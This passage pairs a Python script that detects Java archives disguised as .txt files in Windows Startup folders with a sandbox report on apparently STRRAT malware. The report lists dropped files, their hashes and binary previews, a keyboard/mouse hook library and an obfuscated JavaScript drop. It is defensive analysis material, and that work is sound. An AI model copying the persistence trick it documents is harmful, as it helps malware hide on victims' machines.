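# SHA-256 reported for the vmlpusjwhz.txt Startup drop, lower-cased for comparison.
REPORT_SHA256 = "dfc703a9b8498aa24306908fce67cbf894c7861e07ff778e3fd62315684b579b"

ZIP_MAGIC = b"PK\x03\x04"                        # Zip local file header, as in the preview
ARCHIVE_EXTS = {".jar", ".zip", ".war", ".ear"}  # a Zip under these names is not disguised


def default_startup_dirs():
    """The two Startup locations the report shows the drop in (resolved from the environment)."""
    dirs = []
    for var, leaf in (("ProgramData", "StartUp"), ("APPDATA", "Startup")):
        base = os.environ.get(var)
        if base:
            dirs.append(Path(base) / "Microsoft" / "Windows" / "Start Menu" / "Programs" / leaf)
    return dirs


def sha256_of(path):
    """Stream the file through SHA-256 so large drops do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def inspect_file(path):
    """Return a finding dict if `path` is a Zip/JAR under a non-archive extension, else None."""
    path = Path(path)
    with open(path, "rb") as f:
        head = f.read(len(ZIP_MAGIC))
    if head != ZIP_MAGIC or path.suffix.lower() in ARCHIVE_EXTS:
        return None
    try:
        with zipfile.ZipFile(path) as z:
            entries = z.namelist()
    except zipfile.BadZipFile:
        entries = []          # magic bytes present but the archive is truncated or corrupt
    digest = sha256_of(path)
    return {
        "path": str(path),
        "sha256": digest,
        "is_jar": "META-INF/MANIFEST.MF" in entries,
        "entries": entries,
        "matches_report": digest == REPORT_SHA256,
    }


def scan_startup_dirs(dirs):
    """Inspect every regular file directly inside each Startup directory that exists."""
    findings = []
    for d in dirs:
        d = Path(d)
        if not d.is_dir():
            continue
        for p in sorted(d.iterdir()):
            if p.is_file():
                finding = inspect_file(p)
                if finding:
                    findings.append(finding)
    return findings


def build_fixture(dirpath):
    """Constructed sample: a minimal JAR-like Zip stored as .txt next to a real text file."""
    dirpath = Path(dirpath)
    with zipfile.ZipFile(dirpath / "vmlpusjwhz.txt", "w") as z:
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        z.writestr("carLambo/resources/config.txt", "constructed placeholder, not the real config\n")
    (dirpath / "readme.txt").write_text("plain text, must not be flagged\n")
    return dirpath


def demo():
    """Build the constructed fixture in a temporary directory and scan it; returns the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_startup_dirs([build_fixture(tmp)])


if __name__ == "__main__":
    # Offline run on the constructed fixture; on the affected host use default_startup_dirs().
    for f in demo() + scan_startup_dirs(default_startup_dirs()):
        kind = "JAR" if f["is_jar"] else "Zip"
        note = " (matches reported hash)" if f["matches_report"] else ""
        print(f"{f['path']}: {kind} with {len(f['entries'])} entries, sha256={f['sha256']}{note}")
```

The magic-byte check is what makes the extension irrelevant: a renamed JAR still begins with `PK\x03\x04`. On a live host, a match on REPORT_SHA256 confirms the same drop; a disguised JAR with a different hash is still worth pulling, since STRRAT builds vary while the persistence trick does not.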

C:\ProgramData\Oracle\Java\.oracle_jre_usage\cce3fe3b0d8d83e2.timestamp
Process: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 57
Entropy (8bit): 4.7140402332732085
Encrypted: false
SSDEEP: 3:oFj4I5vpN6yUYCT4WU:oJ5X6y6M
MD5: 186F861FF9D3A549B048DCF183C0DADA
SHA1: E97348CA59A5E872C2F905E027E906F28ACEE2AF
SHA-256: 3A9363603121FB03304A72DD8C294C7695593ACEF776237205DA004C787EFA0E
SHA-512: CE87BC276D355695118931861CC63BD1EC43E67D37A55B28D6A4E702885830C18283A5DFBEB0B97E4A4FA6B089FEA8AF3707A01749AB5D6BBA5D16A3D8207C94
Malicious: false
Preview: C:\Program Files (x86)\Java\jre1.8.0_211..1614143121438..

C:\Users\user\AppData\Local\Temp\jna-99048687\jna6181350368483245817.dll
Process: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 207872
Entropy (8bit): 6.579362539906247
Encrypted: false
SSDEEP: 3072:q9LCZdSWDLC2L5THvPEFKESxLBaj+EdyfWC0EHxvNVmvXsNGpqqqYrZG:VDvL5TQdndmkvXsNGpqOFG
MD5: 28D895A3CB7E9A0B6A5AE5ED6A62B254
SHA1: 703D8604A8D04D29C52C0EBCDE1E86F3BC8FF824
SHA-256: 04C9A8AB43D1EB616B84D0686C8AE1D881EF03FE4F3AA26511E5B19D35EF16AF
SHA-512: C917334BA893313F6062143A25187A313A973B41696C8E446D4D90F7483963F5134CAFE65C86B212815981A9AF27B1ADA7FEB2C9194A3B234C5817FB54D4E531
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar, Detection: malicious
• Filename: Invoice467972.jar, Detection: malicious
• Filename: Invoice467972.jar, Detection: malicious
• Filename: MT0128.jar, Detection: malicious
• Filename: MT0128.jar, Detection: malicious
• Filename: PO348578.jar, Detection: malicious
• Filename: ShippingDoc.jar, Detection: malicious
• Filename: 02_extracted.jar, Detection: malicious
• Filename: , Detection: malicious
• Filename: ntfsmgr.jar, Detection: malicious
• Filename: Specification-037-31-08.jar, Detection: malicious
• Filename: 04_extracted.jar, Detection: malicious
• Filename: Order Quotation ....jar, Detection: malicious
• Filename: tsts11.jar, Detection: malicious
• Filename: Spec#-0537354-17-08.jar, Detection: malicious
• Filename: Spec-10-8-20.jar, Detection: malicious
• Filename: Payment Advice.jar, Detection: malicious
• Filename: , Detection: malicious
• Filename: ORDER SPECIFICATIONS.jar, Detection: malicious
• Filename: SCANPAGO.jar, Detection: malicious
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..G.ty..ty..ty.....ty....~ty.....ty.T.|..ty.T.}..ty.T.z..ty.....ty..tx.[ty...z..ty..ty..ty...}..ty...y..ty...{..ty.Rich.ty.................PE..L....G.]...........!.....D...........M.......`...............................p............@.........................P...T.......<....0.......................@... ..p...................................@............`..,............................text....C.......D.................. ..`.rdata..Rz...`...|...H..............@..@.data...<O.......B..................@....rsrc........0......................@....reloc... ...@..."..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jna-99048687\jna7235467147341798336.dll
Process: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 207872
Entropy (8bit): 6.579362539906247
Encrypted: false
SSDEEP: 3072:q9LCZdSWDLC2L5THvPEFKESxLBaj+EdyfWC0EHxvNVmvXsNGpqqqYrZG:VDvL5TQdndmkvXsNGpqOFG
MD5: 28D895A3CB7E9A0B6A5AE5ED6A62B254
SHA1: 703D8604A8D04D29C52C0EBCDE1E86F3BC8FF824
SHA-256: 04C9A8AB43D1EB616B84D0686C8AE1D881EF03FE4F3AA26511E5B19D35EF16AF
SHA-512: C917334BA893313F6062143A25187A313A973B41696C8E446D4D90F7483963F5134CAFE65C86B212815981A9AF27B1ADA7FEB2C9194A3B234C5817FB54D4E531
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..G.ty..ty..ty.....ty....~ty.....ty.T.|..ty.T.}..ty.T.z..ty.....ty..tx.[ty...z..ty..ty..ty...}..ty...y..ty...{..ty.Rich.ty.................PE..L....G.]...........!.....D...........M.......`...............................p............@.........................P...T.......<....0.......................@... ..p...................................@............`..,............................text....C.......D.................. ..`.rdata..Rz...`...|...H..............@..@.data...<O.......B..................@....rsrc........0......................@....reloc... ...@..."..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jna-99048687\jna8178706811767784369.dll
Process: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 207872
Entropy (8bit): 6.579362539906247
Encrypted: false
SSDEEP: 3072:q9LCZdSWDLC2L5THvPEFKESxLBaj+EdyfWC0EHxvNVmvXsNGpqqqYrZG:VDvL5TQdndmkvXsNGpqOFG
MD5: 28D895A3CB7E9A0B6A5AE5ED6A62B254
SHA1: 703D8604A8D04D29C52C0EBCDE1E86F3BC8FF824
SHA-256: 04C9A8AB43D1EB616B84D0686C8AE1D881EF03FE4F3AA26511E5B19D35EF16AF
SHA-512: C917334BA893313F6062143A25187A313A973B41696C8E446D4D90F7483963F5134CAFE65C86B212815981A9AF27B1ADA7FEB2C9194A3B234C5817FB54D4E531
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..G.ty..ty..ty.....ty....~ty.....ty.T.|..ty.T.}..ty.T.z..ty.....ty..tx.[ty...z..ty..ty..ty...}..ty...y..ty...{..ty.Rich.ty.................PE..L....G.]...........!.....D...........M.......`...............................p............@.........................P...T.......<....0.......................@... ..p...................................@............`..,............................text....C.......D.................. ..`.rdata..Rz...`...|...H..............@..@.data...<O.......B..................@....rsrc........0......................@....reloc... ...@..."..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\83aa4cc77f591dfc2374580bbd95f6ba_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):45
                                                                                                                                          Entropy (8bit):0.9111711733157262
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:/lwlt7n:WNn
                                                                                                                                          MD5:C8366AE350E7019AEFC9D1E6E6A498C6
                                                                                                                                          SHA1:5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
                                                                                                                                          SHA-256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
                                                                                                                                          SHA-512:33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
                                                                                                                                          Malicious:false
                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmlpusjwhz.txt
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):93302
                                                                                                                                          Entropy (8bit):7.907636664666169
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:/1qTnJjXcA/88jc5w+e6saZGIhw8c+/MCZdCa9aQ7IakSyEvaogK0imdgIJX0H:dqTNV9+wdDaZn9/MCZdN7RkSy0ajA+JA
                                                                                                                                          MD5:6A1EFB0C410A7790DBC75FD29ADC48D6
                                                                                                                                          SHA1:5589EAD30D23C96DC8AE7BA03D03066BCB1B17EF
                                                                                                                                          SHA-256:DFC703A9B8498AA24306908FCE67CBF894C7861E07FF778E3FD62315684B579B
                                                                                                                                          SHA-512:7C331441848875875DF4F39E7AF59C040C0EDD010666894C69178064EB52E1A3E310BBF62A35FDF1B2F6EE372B68D75AE395E9EC92ECFFB150EF2B5C5570205F
                                                                                                                                          Malicious:false
                                                                                                                                          C:\Users\user\AppData\Roaming\lib\jna-5.5.0.jar
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          File Type:Java archive data (JAR)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1506993
                                                                                                                                          Entropy (8bit):7.990710311197979
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:24576:BggLnybolJdaW+864NkqCUer8N7sSFOaj5lWOEMIKk6idJRWPTgzq3bICEz2lFO:BTnybo9aW+L5qCUO0xsiMPZrJgPLLIO6
                                                                                                                                          MD5:ACFB5B5FD9EE10BF69497792FD469F85
                                                                                                                                          SHA1:0E0845217C4907822403912AD6828D8E0B256208
                                                                                                                                          SHA-256:B308FAEBFE4ED409DE8410E0A632D164B2126B035F6EACFF968D3908CAFB4D9E
                                                                                                                                          SHA-512:E52575F58A195CEB3BD16B9740EADF5BC5B1D4D63C0734E8E5FD1D1776AA2D068D2E4C7173B83803F95F72C0A6759AE1C9B65773C734250D4CFCDF47A19F82AA
                                                                                                                                          Malicious:false
                                                                                                                                          C:\Users\user\AppData\Roaming\lib\jna-platform-5.5.0.jar
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          File Type:Java archive data (JAR)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2681931
                                                                                                                                          Entropy (8bit):5.90068240083877
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:DyciOooDbK7Yw1J75n4BP/NtK2ov3mhDR6:3iOLDOZJ75nwtK2ovWh8
                                                                                                                                          MD5:2F4A99C2758E72EE2B59A73586A2322F
                                                                                                                                          SHA1:AF38E7C4D0FC73C23ECD785443705BFDEE5B90BF
                                                                                                                                          SHA-256:24D81621F82AC29FCDD9A74116031F5907A2343158E616F4573BBFA2434AE0D5
                                                                                                                                          SHA-512:B860459A0D3BF7CCB600A03AA1D2AC0358619EE89B2B96ED723541E182B6FDAB53AEFEF7992ACB4E03FCA67AA47CBE3907B1E6060A60B57ED96C4E00C35C7494
                                                                                                                                          Malicious:false
                                                                                                                                          C:\Users\user\AppData\Roaming\lib\sqlite-jdbc-3.14.2.1.jar
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4322173
                                                                                                                                          Entropy (8bit):7.994785882289737
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:98304:czJoX0izQbrabWo2MxgErRYxFOY8IsFWyTIiTIzMpca:cJoXHQKW9MxRr8wZZsikzMaa
                                                                                                                                          MD5:B33387E15AB150A7BF560ABDC73C3BEC
                                                                                                                                          SHA1:66B8075784131F578EF893FD7674273F709B9A4C
                                                                                                                                          SHA-256:2EAE3DEA1C3DDE6104C49F9601074B6038FF6ABCF3BE23F4B56F6720A4F6A491
                                                                                                                                          SHA-512:25CFB0D6CE35D0BCB18527D3AA12C63ECB2D9C1B8B78805D1306E516C13480B79BB0D74730AA93BD1752F9AC2DA9FDD51781C48844CEA2FD52A06C62852C8279
                                                                                                                                          Malicious:false
                                                                                                                                          C:\Users\user\AppData\Roaming\lib\system-hook-3.5.jar
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):791222
                                                                                                                                          Entropy (8bit):7.998588520286719
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:24576:IhCFW8WXvOsWW9XGmvcVfkfTnzrLvadKPpv:IhCYWstW202t
                                                                                                                                          MD5:E1AA38A1E78A76A6DE73EFAE136CDB3A
                                                                                                                                          SHA1:C463DA71871F780B2E2E5DBA115D43953B537DAF
                                                                                                                                          SHA-256:2DDDA8AF6FAEF8BDE46ACF43EC546603180BCF8DCB2E5591FFF8AC9CD30B5609
                                                                                                                                          SHA-512:FEE16FE9364926EC337E52F551FD62ED81984808A847DE2FD68FF29B6C5DA0DCC04EF6D8977F0FE675662A7D2EA1065CDCDD2A5259446226A7C7C5516BD7D60D
                                                                                                                                          Malicious:false
                                                                                                                                          C:\Users\user\AppData\Roaming\plugins.jar
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):93302
                                                                                                                                          Entropy (8bit):7.907636664666169
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:/1qTnJjXcA/88jc5w+e6saZGIhw8c+/MCZdCa9aQ7IakSyEvaogK0imdgIJX0H:dqTNV9+wdDaZn9/MCZdN7RkSy0ajA+JA
                                                                                                                                          MD5:6A1EFB0C410A7790DBC75FD29ADC48D6
                                                                                                                                          SHA1:5589EAD30D23C96DC8AE7BA03D03066BCB1B17EF
                                                                                                                                          SHA-256:DFC703A9B8498AA24306908FCE67CBF894C7861E07FF778E3FD62315684B579B
                                                                                                                                          SHA-512:7C331441848875875DF4F39E7AF59C040C0EDD010666894C69178064EB52E1A3E310BBF62A35FDF1B2F6EE372B68D75AE395E9EC92ECFFB150EF2B5C5570205F
                                                                                                                                          Malicious:true
                                                                                                                                          C:\Users\user\AppData\Roaming\vmlpusjwhz.txt
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):93302
                                                                                                                                          Entropy (8bit):7.907636664666169
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:/1qTnJjXcA/88jc5w+e6saZGIhw8c+/MCZdCa9aQ7IakSyEvaogK0imdgIJX0H:dqTNV9+wdDaZn9/MCZdN7RkSy0ajA+JA
                                                                                                                                          MD5:6A1EFB0C410A7790DBC75FD29ADC48D6
                                                                                                                                          SHA1:5589EAD30D23C96DC8AE7BA03D03066BCB1B17EF
                                                                                                                                          SHA-256:DFC703A9B8498AA24306908FCE67CBF894C7861E07FF778E3FD62315684B579B
                                                                                                                                          SHA-512:7C331441848875875DF4F39E7AF59C040C0EDD010666894C69178064EB52E1A3E310BBF62A35FDF1B2F6EE372B68D75AE395E9EC92ECFFB150EF2B5C5570205F
                                                                                                                                          Malicious:true
                                                                                                                                          C:\Users\user\fukvowbkrs.js
                                                                                                                                          Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
                                                                                                                                          File Type:ASCII text, with very long lines
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):737167
                                                                                                                                          Entropy (8bit):4.705946433849389
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:egg4cP9SSJTS7PEwU5tTBWoZEIZCSfq7mjJMF4taWAo/YABu1kL3QNQoxvHp6GVE:M
                                                                                                                                          MD5:EE526513580FDCE38FBD47E380081DA0
                                                                                                                                          SHA1:05A7DBB90B51A6BF6EEF394DC565A22242A4E0DD
                                                                                                                                          SHA-256:EDF1D7DFB797D66CEACE6695998240EDF67C5F08D06767A66ABC1C66830527F4
                                                                                                                                          SHA-512:C14E5381A3C569918957FC0A35B0970786B2E128709E8A26419AE96972BC8B507DD44DA51E60871AB85313C63D4045035E4A48EEE15BA2DF731A7328FCD8618F
                                                                                                                                          Malicious:false
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: C:\Users\user\fukvowbkrs.js, Author: Florian Roth
                                                                                                                                          C:\Users\user\lib\jna-5.5.0.jard
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                          File Type:Java archive data (JAR)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1506993
                                                                                                                                          Entropy (8bit):7.990710311197979
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:24576:BggLnybolJdaW+864NkqCUer8N7sSFOaj5lWOEMIKk6idJRWPTgzq3bICEz2lFO:BTnybo9aW+L5qCUO0xsiMPZrJgPLLIO6
                                                                                                                                          MD5:ACFB5B5FD9EE10BF69497792FD469F85
                                                                                                                                          SHA1:0E0845217C4907822403912AD6828D8E0B256208
                                                                                                                                          SHA-256:B308FAEBFE4ED409DE8410E0A632D164B2126B035F6EACFF968D3908CAFB4D9E
                                                                                                                                          SHA-512:E52575F58A195CEB3BD16B9740EADF5BC5B1D4D63C0734E8E5FD1D1776AA2D068D2E4C7173B83803F95F72C0A6759AE1C9B65773C734250D4CFCDF47A19F82AA
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: PK..........^O................META-INF/....PK..........^O...L............META-INF/MANIFEST.MF.._O.0...+.;............ahehE."...cgv.}.].i...i{..s.>>.....`.....J^....{sYX.....5......[h......-....q0.6.%.|.. ..c.i../..r.-.5.0..f+.7I.;.......".IV.=.D...H.A.J_..9......M..4...W9.....6.zZ...3g..tG....3....Q..._..N.`...p.y+.n.xw4*..z+C.Y`./Jc.o..WW..;B..=.....4..Lh.~..M..Q.~.6Jp......~m..p...Z.R.V..Oq..F.U....r.a.Yh...^].?.v.b/%.=e?.kt....e..Nw..n.{.......E..].P!.h.N....N."/..._<.&..{.C!.$......O..L....,+..S..Y..9{.gX- ..R....S"...xTGm..0........*.]J.M.dT.......9.b.(....\......,'...>..].i.q/..J<.Hy..k.9H.E.J.....!.Q!....*.8...j..^.7Y..Sv..r+8..Y..4..7V........&-th..v(rZ....F.~..G.~..r.:..sj....0.-.,.....k.H[.^T.}.....UTH.)g.0..,l.6|...fr..\...t~Usz......J,....6&l}.m....M...9.cPKT1.;....h^....u.{... C...^...2%yuD.2...Z9...t.~....PK..........^O................com/PK..........^O................com/sun/PK..........^O................com/sun/jna/PK..........^O..
                                                                                                                                          C:\Users\user\lib\jna-platform-5.5.0.jard
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                          File Type:Java archive data (JAR)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2681931
                                                                                                                                          Entropy (8bit):5.90068240083877
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:DyciOooDbK7Yw1J75n4BP/NtK2ov3mhDR6:3iOLDOZJ75nwtK2ovWh8
                                                                                                                                          MD5:2F4A99C2758E72EE2B59A73586A2322F
                                                                                                                                          SHA1:AF38E7C4D0FC73C23ECD785443705BFDEE5B90BF
                                                                                                                                          SHA-256:24D81621F82AC29FCDD9A74116031F5907A2343158E616F4573BBFA2434AE0D5
                                                                                                                                          SHA-512:B860459A0D3BF7CCB600A03AA1D2AC0358619EE89B2B96ED723541E182B6FDAB53AEFEF7992ACB4E03FCA67AA47CBE3907B1E6060A60B57ED96C4E00C35C7494
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: PK..........^O................META-INF/....PK..........^O.p..E...E.......META-INF/MANIFEST.MFManifest-Version: 1.0..Ant-Version: Apache Ant 1.10.6..Created-By: 1.8.0_201-b09 (Oracle Corporation)..Implementation-Title: com.sun.jna.platform..Implementation-Vendor: JNA Development Team..Implementation-Version: 5.5.0 (b0)..Specification-Title: Java Native Access (JNA)..Specification-Vendor: JNA Development Team..Specification-Version: 5..Automatic-Module-Name: com.sun.jna.platform..Bundle-Category: jni..Bundle-ManifestVersion: 2..Bundle-Name: jna-platform..Bundle-Description: JNA Platform Library..Bundle-SymbolicName: com.sun.jna.platform..Bundle-Version: 5.5.0..Bundle-RequiredExecutionEnvironment: J2SE-1.4..Bundle-Vendor: JNA Development Team..Require-Bundle: com.sun.jna;bundle-version="5.5.0"..Export-Package: com.sun.jna.platform;version=5.5.0, com.sun.jna.platf.. orm.dnd;version=5.5.0, com.sun.jna.platform.linux;version=5.5.0, com... sun.jna.platform.mac;version=5.5.0, com.sun.jna.plat
                                                                                                                                          C:\Users\user\lib\sqlite-jdbc-3.14.2.1.jard
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4322173
                                                                                                                                          Entropy (8bit):7.994785882289737
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:98304:czJoX0izQbrabWo2MxgErRYxFOY8IsFWyTIiTIzMpca:cJoXHQKW9MxRr8wZZsikzMaa
                                                                                                                                          MD5:B33387E15AB150A7BF560ABDC73C3BEC
                                                                                                                                          SHA1:66B8075784131F578EF893FD7674273F709B9A4C
                                                                                                                                          SHA-256:2EAE3DEA1C3DDE6104C49F9601074B6038FF6ABCF3BE23F4B56F6720A4F6A491
                                                                                                                                          SHA-512:25CFB0D6CE35D0BCB18527D3AA12C63ECB2D9C1B8B78805D1306E516C13480B79BB0D74730AA93BD1752F9AC2DA9FDD51781C48844CEA2FD52A06C62852C8279
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: PK........8f>I................META-INF/PK........7f>IzVC.....s.......META-INF/MANIFEST.MF..Oo.0.....,.k..-%..P.m..U...L2..&fm....@ .E.=o~o........7H.D.".8.5..mA.....L.c..F......!.lh..4.[H.0K...![.....Tq..1...G..@.?..\...P.."ao..S.:w.}.}.t.EW...b.6..(.5a....p.8[H*..p.bH..h..&l.w....D.e.We.<..h.=.....zx.:.W.ft.......a.....$......{..{..K..0.ZfP7.N>q......FH..4.....B.....:.q4.../..^f....;....m....V.....b..u..v0.k.S.9 .....<G...@..Bl87s.....p.K.;..5.x1.i]...:.l8_./.~.-.7....g[O...U;.$(..r..../.m.E2...=....CT..6K.9....=v=.s}..OPK........We>I................META-INF/maven/PK........We>I................META-INF/maven/org.xerial/PK........We>I............&...META-INF/maven/org.xerial/sqlite-jdbc/PK........We>I................META-INF/services/PK........QT>I................org/PK........8f>I................org/sqlite/PK........8f>I................org/sqlite/core/PK........8f>I................org/sqlite/date/PK........8f>I................org/sqlite/javax/PK........8f>I..
                                                                                                                                          C:\Users\user\lib\system-hook-3.5.jard
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):791222
                                                                                                                                          Entropy (8bit):7.998588520286719
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:24576:IhCFW8WXvOsWW9XGmvcVfkfTnzrLvadKPpv:IhCYWstW202t
                                                                                                                                          MD5:E1AA38A1E78A76A6DE73EFAE136CDB3A
                                                                                                                                          SHA1:C463DA71871F780B2E2E5DBA115D43953B537DAF
                                                                                                                                          SHA-256:2DDDA8AF6FAEF8BDE46ACF43EC546603180BCF8DCB2E5591FFF8AC9CD30B5609
                                                                                                                                          SHA-512:FEE16FE9364926EC337E52F551FD62ED81984808A847DE2FD68FF29B6C5DA0DCC04EF6D8977F0FE675662A7D2EA1065CDCDD2A5259446226A7C7C5516BD7D60D
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: PK.........x.N................META-INF/PK.........x.N................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r,J..,K-B...V..+.$x...R.KRSt.*......3R.|..R....L..y..J3sJ....&.f.f...]..l.-.z.zF.\.\.PK..PSF.m.......PK........lx.N................lc/PK........lx.N................lc/kra/PK........mx.N................lc/kra/system/PK........mx.N................lc/kra/system/keyboard/PK........mx.N................lc/kra/system/keyboard/event/PK.........x.N................lc/kra/system/lib/PK........mx.N................lc/kra/system/mouse/PK........mx.N................lc/kra/system/mouse/event/PK........mx.N............"...lc/kra/system/GlobalHookMode.class.R]o.A.=...,_[.R...Z....O....6Y..m1..W.v.M.h.4.F..?.xg%.b..pO..s.;3.~......0Dl(."'!%!. .M..d..*nq.S.I..24...;..Z.z..0,.N.p.3..O...-.t.......{......Uu..M.-5.7..i.`Xy7.3ta:C.....%....q.v..a.e.N.C;..r...........n.`.z..)...j..6.....XSt..k.....=..[.;.5.{.....q...GJB...J..7.L...a.2.........6w.0M..j*..C.T.Qb..RT..3..XQ.GBE.....
                                                                                                                                          C:\Users\user\vmlpusjwhz.txt
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):93302
                                                                                                                                          Entropy (8bit):7.907636664666169
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:/1qTnJjXcA/88jc5w+e6saZGIhw8c+/MCZdCa9aQ7IakSyEvaogK0imdgIJX0H:dqTNV9+wdDaZn9/MCZdN7RkSy0ajA+JA
                                                                                                                                          MD5:6A1EFB0C410A7790DBC75FD29ADC48D6
                                                                                                                                          SHA1:5589EAD30D23C96DC8AE7BA03D03066BCB1B17EF
                                                                                                                                          SHA-256:DFC703A9B8498AA24306908FCE67CBF894C7861E07FF778E3FD62315684B579B
                                                                                                                                          SHA-512:7C331441848875875DF4F39E7AF59C040C0EDD010666894C69178064EB52E1A3E310BBF62A35FDF1B2F6EE372B68D75AE395E9EC92ECFFB150EF2B5C5570205F
                                                                                                                                          Malicious:false
